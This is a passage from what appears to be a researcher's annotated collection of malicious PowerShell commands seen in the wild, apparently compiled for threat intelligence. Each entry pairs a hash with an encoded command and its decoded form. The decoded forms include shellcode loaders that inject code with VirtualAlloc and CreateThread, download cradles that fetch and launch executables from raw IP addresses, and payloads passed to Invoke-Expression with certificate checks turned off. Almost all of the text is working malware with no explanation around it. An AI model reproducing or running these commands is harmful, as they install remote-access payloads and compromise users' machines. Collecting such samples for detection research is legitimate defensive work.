0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,0xda,0x4f,0xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,
0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  185. 1a630967c00c7ac77872d90852ad37bed76ae4a884d326e4381fb8cfc82d1848
  186. powershell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$windir1=Get-ChildItem Env:windir;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$windir1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -exec Bypass IEX $($iex1) -->  +++ $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://ub14.westeurope.cloudapp.azure.com:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), 
$p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  187. ce9555fdce7fafafaba96a7af54b3e5c125d067010c30080ca2c1f71bc7404ce
  188. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$windir1=Get-ChildItem Env:windir;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVZdj5tGFH33rxhZPNhasxpgABNrpaSNKkWqokq7ah4sP8AwZFExtjBOvUn638s9+A7Guxu1ebnMx517zv0axtHiTrydTtbvq+rDdr9r2tn0L9PUpgr827yqpvON2B+zqtTi0KZt9zGnttsXH+r2j7YRf5ZNe0yrd1W107Pz2t8LcSzrVpzO36fz9+t89dM4vzYmbc3DY/fJGed4tvtlIQbk8+gC+7xyjb49fNFN+1+wt2Z7MO3suWXr1fTtxNl1gXyX5+7D094ItzuTmea9Kcq6bMtdLRwt3I/p1ojpp7IO/Klw62522KfaCKz8dqw1aR6Eu08Ph/axOU6c052ze/NmFGS5kCdPSvoE/UfJ+Uqsf3lqzXqzcQ6UUXkqdLdjlp1YJp2A4iAiyRsmJENeJ3KfNhRtZJ0IfSCMplKPpp5VjmnqE5osOpHFRCultYjNFwWPNBlNyVRAIqK1mEYSVmjkk4qGMh2TOQlMybIhvUIyjTAes7Kclc8YOJsPGzSKEZyQCcWKOQ/K4XCClL2lBVoyyV45IFYBo6mE9QIboV7vh9F41d+A0AxIEt2CjEpCi0mvoN0g46mvWA9hCq84qxHnKLL8QDwbKXt6pNzrXXlkC0kpNg8RZiyQ35BUQopuaN2HRwAKC96FZY+IG3AhfiG5FZFeZEiEnK2+lGkjpjBFiVVJmJWBAcV6SrMyClPGzCW3bYApSupaRGwlSHkaE0Y6tgLiaDC43yc5Yc8hopQzeLWGggsDHgGtL28ykBCGjp6jqYJDPHQyegEG+rvCZ1ZLxbsXwrMjiwvLIWH4hitswAUhcAFxz/qLs0tABovLO6fPh7TuK4sGA8UoxChgRdPEcB38/0T56COaonXjKxeG3qeRR0DoANxhCBNOXN2diEtODAySIl9QITT0NNAG4ZNAQ/R1quw04Dj35b3k0QAZDdWEYBej+OHuHEavb8QcnJzWiohHypJEcJJghIaLIlty3lC7PkoAacSlQMFGg/WXzHJkILPH+hr3RolCxyeRrRL/tUQpzmr4wu3t2XJE1EJbYT01ezfhrhtabSgVBCelLIRXpYILXrP7yIc2IwPohd4FFOHYhQtWNgEIDi68qOBjL52AMn53GW2kPofu4hYgFVTiVcEp3J0JVxj+00CLAx4htX1gX60/JD56bj6CMznTjWBeW8uxNTqgoSXlalLsGjFzyju5ckrhVqabHPTt76b+3D663rxbvbmZi2/0/jk/wNb9C2wzc063D7tuEviz+Y1TzheiO7p2ys1CeHPxXeyOrVsfq2r1z8T5ihfU6PnYebRwTgv60Mvpvk2b1r2vjNkL997oXZ0LemBJ+S8= \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$windir1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -exec Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern 
IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,0xda,0x4f,0
xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  189. 3348d1d9eb7dbdd6d476a6512d6af40c7819c8a07097344fc210885fcca08611
  190. powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 --> $wc=NeW-OBjEcT SysTem.NeT.WebCliEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HEadERs.AdD('User-Agent',$u);$Wc.PrOXy = [SysTeM.Net.WEbReqUeST]::DefAuLTWEBProxY;$WC.ProXY.CREdeNTiALS = [SysTeM.NET.CrEdenTIALCAChe]::DefAUlTNetwoRkCrEdENTiALs;$K='.y)RHTANZMg9(@C8Yt!E]5~XPnd_aJk3';$I=0;[ChAr[]]$b=([Char[]]($WC.DOwNloADSTrIng("https://74.202.242.20:443/index.asp")))|%{$_-BXor$k[$I++%$K.LENgth]};IEX ($B-JoIN'')
  191. b7d3cd6cd98fa476c9c6a719459664126929ac79c6c4d31821bf1bad8dd035cb
  192. POWERSHELL.EXE powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADkALgAyADQAOAAuADEANgA2AC4AMQA0ADAALwB+AHoAZQBiAHIAYQAvAGkAZQBzAGUAYwB2AC4AZQB4AGUAJwAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBrAGUAbQAuAGUAeABlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBrAGUAbQAuAGUAeABlACIAKQA= --> (New-Object System.Net.WebClient).DownloadFile('http://89.248.166.140/~zebra/iesecv.exe',"$env:APPDATA\scvkem.exe");Start-Process ("$env:APPDATA\scvkem.exe")
  193. f44ba234ed084e4c38e568ad38039fd087e8c4206d7a6369703af85cbcf64765
  194. POWERSHELL.EXE powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADcANAAuADkANAAuADEAMwA3AC8AfgBrAGEAcgBtAGEALwBzAGMAdgBoAG8AcwB0AC4AZQB4AGUAJwAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBoAG8AcwB0AC4AZQB4AGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAHMAYwB2AGgAbwBzAHQALgBlAHgAZQAiACkA --> (New-Object System.Net.WebClient).DownloadFile('http://93.174.94.137/~karma/scvhost.exe',"$env:APPDATA\scvhost.exe");Start-Process ("$env:APPDATA\scvhost.exe")
  195. 85eddb2bf83b31c3c94bf8f44c8560a193400ded27f7e494839e6dbc471728bb
  196. POWERSHELL.EXE powershell -window hidden -enc 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 --> PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://94.102.52.13/~harvy/scvhost.exe', $env:APPDATA\scvhost.exe );Start-Process ( $env:APPDATA\scvhost.exe )
  197. f59ae9e1b2d31563555795900539e365f3dc17295eacdacd8d251aa7836bee56
  198. powershell.exe -window hidden -EncodedCommand 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 --> $ZZLt = '$9Wk = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $9Wk -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xba,0x84,0xbb,0x0f,0xcc,0xda,0xdd,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x6f,0x83,0xe8,0xfc,0x31,0x50,0x11,0x03,0x50,0x11,0xe2,0x71,0x47,0xe7,0x45,0x79,0xb8,0xf8,0x35,0xf0,0x5d,0xc9,0x67,0x66,0x15,0x78,0xb8,0xed,0x7b,0x71,0x33,0xa3,0x6f,0x02,0x31,0x6b,0x9f,0xa3,0xfc,0x4d,0xae,0x34,0x31,0x51,0x7c,0xf6,0x53,0x2d,0x7f,0x2b,0xb4,0x0c,0xb0,0x3e,0xb5,0x49,0xad,0xb1,0xe7,0x02,0xb9,0x60,0x18,0x27,0xff,0xb8,0x19,0xe7,0x8b,0x81,0x61,0x82,0x4c,0x75,0xd8,0x8d,0x9c,0x26,0x57,0xc5,0x04,0x4c,0x3f,0xf5,0x35,0x81,0x23,0xc9,0x7c,0xae,0x90,0xba,0x7e,0x66,0xe9,0x43,0xb1,0x46,0xa6,0x7a,0x7d,0x4b,0xb6,0xbb,0xba,0xb4,0xcd,0xb7,0xb8,0x49,0xd6,0x0c,0xc2,0x95,0x53,0x90,0x64,0x5d,0xc3,0x70,0x94,0xb2,0x92,0xf3,0x9a,0x7f,0xd0,0x5b,0xbf,0x7e,0x35,0xd0,0xbb,0x0b,0xb8,0x36,0x4a,0x4f,0x9f,0x92,0x16,0x0b,0xbe,0x83,0xf2,0xfa,0xbf,0xd3,0x5b,0xa2,0x65,0x98,0x4e,0xb7,0x1c,0xc3,0x06,0x29,0x44,0x8f,0xd6,0xdd,0xf1,0x06,0xb9,0x74,0x77,0x3e,0x11,0xef,0xcb,0xc9,0xbc,0xe8,0x2c,0xe0,0xf0,0x09,0x85,0x5d,0xa4,0xa2,0x7c,0x09,0x70,0x1b,0xf8,0x6e,0x7b,0x76,0x11,0x10,0xdf,0x48,0x2f,0x81,0x8e,0xc0,0xac,0x70,0x60,0x7f,0xe3,0x21,0xd2,0x17,0x54,0x4c,0x4d,0x21,0xa5,0x9b,0x99,0xe1,0x03,0x12,0x8c,0xac,0xdb,0x54,0x02,0x31,0x98,0x06,0x30,0xe3,0xf1,0xf4,0xe4,0x6b,0x19,0xad,0x2a,0x57,0x22,0x98,0xba,0x61,0xb6,0x32,0xe6,0x05,0xc7,0x01,0x18,0xd6,0x4e,0x85,0x72,0xd2,0x00
,0x2f,0x9c,0x8c,0xc8,0xda,0xe4,0xae,0x8f,0xdb,0x3c,0xff,0x70,0x74,0xe8,0x57,0xd8,0x2c,0x7e,0x75,0xe0,0xc8,0x05,0x7a,0x39,0x6d,0x39,0xf1,0xdc,0x26,0xb5,0x7e,0x9b,0xb8,0xc9,0x7e,0xb7,0x69,0x20,0xef,0x47,0x89,0xb3,0xf8,0xe4,0x76,0x4c,0x07,0xdb,0xe9,0xdd,0x9c,0x45,0x8a,0x0f,0x38,0xfe,0x29,0x50,0x29,0x95,0x80,0x90,0xf2,0x3a,0x88,0x12,0x67,0xb9,0x1c,0x79,0x75,0xd7,0x9e,0x2a,0x11,0xfd,0x68,0x0e,0xae,0xfe,0x41,0x3c,0x00,0xc1,0x0f,0xfb,0x67,0xc2,0xe6,0x3f,0x33,0x49,0xb4,0x9b,0xb4,0x60,0x84,0x50,0xc7,0xd2,0x55,0xcf,0xa0,0xc0,0xc3,0x66,0xd2,0x1a,0x3e,0xfd,0xd3,0x91,0xed,0xa6,0x56,0x99,0x99,0x40,0x33,0x1a,0x35,0x3d,0x4e,0x5e,0x91,0xb1,0x00,0x0c,0xb1,0xe4,0xf7,0x1c,0x1a,0x08,0x22,0xe3,0x70,0xf2,0x26,0x2a,0xdb,0x93,0x7e,0x25,0x5c,0x31,0x80,0x9f,0x08,0xb6,0x29,0x48,0xfd,0x3d,0xba,0x0f,0x02,0x94,0x2f,0x10,0x94,0xe7,0x05,0xb2,0x32,0xf7,0xb3,0x5b,0x2a,0xf8,0xc3,0x63,0x0f,0x75,0x4e,0xf3,0xfd,0x26,0xec,0x7e,0x66,0xf7,0x96,0xe9,0x04,0x62,0x57,0x02,0xd1,0x93,0xa8,0x2d,0xbe,0x06,0x3d,0xb0,0x2c,0xb6,0xa6,0x1a,0xcf,0x27,0x44,0x63;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$UuW=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($UuW.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$UuW,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($ZZLt));$izP = "-enc ";if([IntPtr]::Size -eq 8){$slwO = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $slwO $izP $e"}else{;iex "& powershell $izP $e";}
  199. acbedcba51bfcd9743e0561fd8276f97b791174bc9152bd74d6ea4523f18cc70
  200. ###:END prepared by @JohnLaTwC